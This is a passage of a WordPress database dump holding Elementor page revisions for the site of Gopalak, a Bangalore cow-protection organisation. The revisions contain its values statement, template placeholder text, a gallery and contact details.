.elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-10 18:12:20','2022-10-10 12:42:20','',1373,'https://gopalak.in/?p=1595',0,'revision','',0),(1596,1,'2022-10-10 18:12:20','2022-10-10 12:42:20','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Group-122.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Adobt\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-10 18:12:20','2022-10-10 12:42:20','',1373,'https://gopalak.in/?p=1596',0,'revision','',0),(1597,1,'2022-10-10 18:12:20','2022-10-10 12:42:20','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Group-122.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Adobt\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-10 18:12:20','2022-10-10 12:42:20','',1373,'https://gopalak.in/?p=1597',0,'revision','',0),(1598,1,'2022-10-10 18:15:23','2022-10-10 12:45:23','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Group-122.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Adobt\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n		